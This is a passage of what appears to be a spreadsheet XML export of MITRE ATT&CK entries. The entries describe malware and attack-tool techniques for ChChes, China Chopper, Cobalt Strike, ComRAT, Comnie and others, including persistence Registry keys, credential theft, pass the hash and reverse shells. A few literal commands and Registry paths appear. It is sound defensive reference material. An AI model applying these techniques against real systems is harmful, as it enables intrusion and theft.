    <t>[ChChes](https://attack.mitre.org/software/S0144) samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) steals credentials stored inside Internet Explorer.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) can alter the victim's proxy configuration.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects the victim's %TEMP% directory path and version of Internet Explorer.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) is capable of downloading files, including additional modules.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects its process identifier (PID) on the victim.(Citation: Palo Alto menuPass Feb 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) establishes persistence by adding a Registry Run key.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) can encode C2 data with a custom technique that utilizes Base64.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) can encrypt C2 traffic with AES or RC4.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) collects the victim hostname, window resolution, and Microsoft Windows version.(Citation: Palo Alto menuPass Feb 2017)(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[ChChes](https://attack.mitre.org/software/S0144) communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) conducts brute force attacks against SSH services to gain initial access.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>After initial compromise, [Chaos](https://attack.mitre.org/software/S0220) will download a second stage to establish a more permanent presence on the affected system.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell connection on 8338/TCP, encrypted via AES.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port.(Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>AppInit DLLs</t>
  </si>
  <si>
    <t>Some variants of [Cherry Picker](https://attack.mitre.org/software/S0107) use AppInit_DLLs to achieve persistence by creating the following Registry key: &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows "AppInit_DLLs"="pserver32.dll"&lt;/code&gt;(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>[Cherry Picker](https://attack.mitre.org/software/S0107) exfiltrates files over FTP.(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>Recent versions of [Cherry Picker](https://attack.mitre.org/software/S0107) delete files and registry keys created by the malware.(Citation: Trustwave Cherry Picker)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can upload local files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can list directory contents.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can download remote files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can spider authentication portals.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>Password Guessing</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can perform brute force password guessing against authentication portals.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s client component is packed with UPX.(Citation: Lee 2013)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can change the timestamp of files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component executes code sent via HTTP POST commands.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component is a Web Shell payload.(Citation: Lee 2013)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component is capable of opening a command terminal.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>One variant of [CloudDuke](https://attack.mitre.org/software/S0054) uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CloudDuke](https://attack.mitre.org/software/S0054) downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>One variant of [CloudDuke](https://attack.mitre.org/software/S0054) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can conduct peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can download a hosted "beacon" payload using [BITSAdmin](https://attack.mitre.org/software/S0190).(Citation: CobaltStrike Scripted Web Delivery)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a number of known techniques to bypass Windows UAC.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use self signed Java applets to execute signed applet attacks.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a custom command and control protocol that can encapsulated in DNS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can collect data from a local system.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deobfuscate shellcode using a rolling XOR.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deliver "beacon" payloads for lateral movement by leveraging remote COM execution.(Citation: Cobalt Strike DCOM Jan 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine if the user on an infected machine is in the admin or domain admin group.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>Domain Accounts</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use known credentials to run commands and spawn processes as a domain user account.(Citation: cobaltstrike manual)(Citation: CobaltStrike Daddy May 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to load DLLs via reflective injection.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can exploit vulnerabilities such as MS14-058.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) includes a capability to modify the "beacon" payload to eliminate known signatures or unpacking methods.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deliver additional payloads to victim machines.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>The [Cobalt Strike](https://attack.mitre.org/software/S0154) System Profiler can use JavaScript to perform reconnaissance actions.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can track key presses with a keylogger module.(Citation: cobaltstrike manual)(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>Local Accounts</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use known credentials to run commands and spawn processes as a local user account.(Citation: cobaltstrike manual)(Citation: CobaltStrike Daddy May 2017)</t>
  </si>
  <si>
    <t>Make and Impersonate Token</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can make tokens from known credentials.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can modify Registry values within &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office\&lt;Excel Version&gt;\Excel\Security\AccessVBOM\&lt;/code&gt; to enable the execution of additional code.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s "beacon" payload is capable of running shell commands without &lt;code&gt;cmd.exe&lt;/code&gt; and PowerShell commands without &lt;code&gt;powershell.exe&lt;/code&gt;(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform port scans from an infected host.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can query shared drives on the local system.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can be configured to use TCP for C2 communications.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can hash functions to obfuscate calls to the Windows API.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>Parent PID Spoofing</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can spawn processes with alternate PPIDs.(Citation: CobaltStrike Daddy May 2017)</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform pass the hash.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.(Citation: cobaltstrike manual)(Citation: Cyberreason Anchor December 2019) [Cobalt Strike](https://attack.mitre.org/software/S0154) can also use [PowerSploit](https://attack.mitre.org/software/S0194) and other scripting frameworks to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s "beacon" payload can collect information on process details.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use process hollowing for execution.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can inject a variety of payloads into processes dynamically chosen by the adversary.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Python to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can query &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office\&lt;Excel Version&gt;\Excel\Security\AccessVBOM\&lt;/code&gt;  to determine if the security setting for restricting default programmatic access is enabled.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Window admin shares (C$ and ADMIN$) for lateral movement.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can SSH to a remote service.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can set its "beacon" payload to reach out to the C2 server on an arbitrary and random interval. In addition it will break large data sets into smaller chunks for exfiltration.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s "beacon" payload is capable of capturing screenshots.(Citation: cobaltstrike manual)(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>Security Account Manager</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can recover hashed passwords.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use [PsExec](https://attack.mitre.org/software/S0029) to execute a payload on a remote host. It can also use Service Control Manager to start new services.(Citation: cobaltstrike manual)(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine the IP addresses of domain controllers.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can produce a sessions report from compromised hosts.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can timestomp any files or payloads placed on a target machine to help them blend in.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can steal access tokens from exiting processes.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use VBA to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) uses a command-line interface to interact with systems.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use WMI to deliver a payload to a remote host.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use &lt;code&gt;WinRM&lt;/code&gt; to execute a payload on a remote host.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can install a new service.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform voice recording on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) uses DNS for C2.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform keylogging on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) creates an autostart Registry key to ensure persistence.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform screen capture.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) obfuscates communications with the C2 server using Base64 encoding.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to access the webcam on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) can launch a remote command shell interface for executing commands.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) decodes the initially-downloaded hidden encoded file using OpenSSL.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) downloads the EggShell mach-o binary using curl, which does not set the quarantine flag.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) downloads the following hidden files to evade detection and maintain persistence: /private/tmp/.info.enc, /private/tmp/.info.py, /private/tmp/.server.sh, ~/Library/LaunchAgents/.espl.plist, ~/Library/Containers/.[random string]/[random string].(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) executes a Python script to download its second stage.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) initially downloads a hidden encoded file.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) executes a bash script to establish a reverse shell.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) can use SSL/TLS encryption for its HTTP-based C2 channel. [ComRAT](https://attack.mitre.org/software/S0126) has used public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has the ability to use the Gmail web UI to receive commands and exfiltrate information.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location &lt;code&gt;HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32&lt;/code&gt;.(Citation: NorthSec 2015 GData Uroburos Tools)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used unique per machine passwords to decrypt the orchestrator payload and a hardcoded XOR key to decrypt its communications module. [ComRAT](https://attack.mitre.org/software/S0126) has also used a unique password to decrypt the file used for its hidden file system.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has injected its orchestrator DLL into explorer.exe. [ComRAT](https://attack.mitre.org/software/S0126) has also injected its communications module into the victim's default browser to make C2 connections appear less suspicious as all network connections will be initiated by the browser process.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can use email attachments for command and control.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a task name associated with Windows SQM Consolidator.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has encrypted and stored its orchestrator code in the Registry as well as a PowerShell script into the WsqmCons Registry key.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can load a PE file from memory or the file system and execute it with &lt;code&gt;CreateProcessW&lt;/code&gt;.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has used encryption and base64 to obfuscate its orchestrator code in the Registry. [ComRAT](https://attack.mitre.org/software/S0126) has also embedded an XOR encrypted communications module inside the orchestrator module. [ComRAT](https://attack.mitre.org/software/S0126) has encrypted its virtual file system using AES-256 in XTS mode and has encoded PowerShell scripts.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used PowerShell to load itself every time a user logs in to the system. [ComRAT](https://attack.mitre.org/software/S0126) can execute PowerShell scripts loaded into memory or from the file system.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can check the default browser by querying &lt;code&gt;HKCR\http\shell\open\command&lt;/code&gt;.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a scheduled task to launch its PowerShell loader.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has been programmed to sleep outside local business hours (9 to 5, Monday to Friday).(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can check the victim's default browser to determine which process to inject its communications module into.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday).(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used HTTP requests for command and control.(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used &lt;code&gt;cmd.exe&lt;/code&gt; to execute commands.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes a batch script to store discovery information in %TEMP%\info.dat and then uploads the temporarily file to the remote C2 server.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses the &lt;code&gt;net user&lt;/code&gt; command.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses RC4 and Base64 to obfuscate strings.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses the &lt;code&gt;tasklist&lt;/code&gt; to view running processes on the victim’s machine.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) achieves persistence by adding a shortcut of itself to the startup path in the Registry.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) runs the &lt;code&gt;net view&lt;/code&gt; command</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses Rundll32 to load a malicious DLL.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) attempts to detect several anti-virus products.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) establishes persistence via a .lnk file in the victim’s startup path.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) encrypts command and control communications with RC4.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) collects the hostname of the victim machine.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses &lt;code&gt;ipconfig /all&lt;/code&gt; and &lt;code&gt;route PRINT&lt;/code&gt; to identify network adapter and interface information.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes the &lt;code&gt;netstat -ano&lt;/code&gt; command.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) runs the command: &lt;code&gt;net start &gt;&gt; %TEMP%\info.dat&lt;/code&gt; on a victim.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes VBS scripts.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses HTTP for C2 communication.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes BAT scripts.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can be used to execute PowerShell commands on target machines.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can take screenshots on remote hosts.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can record video on remote hosts.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
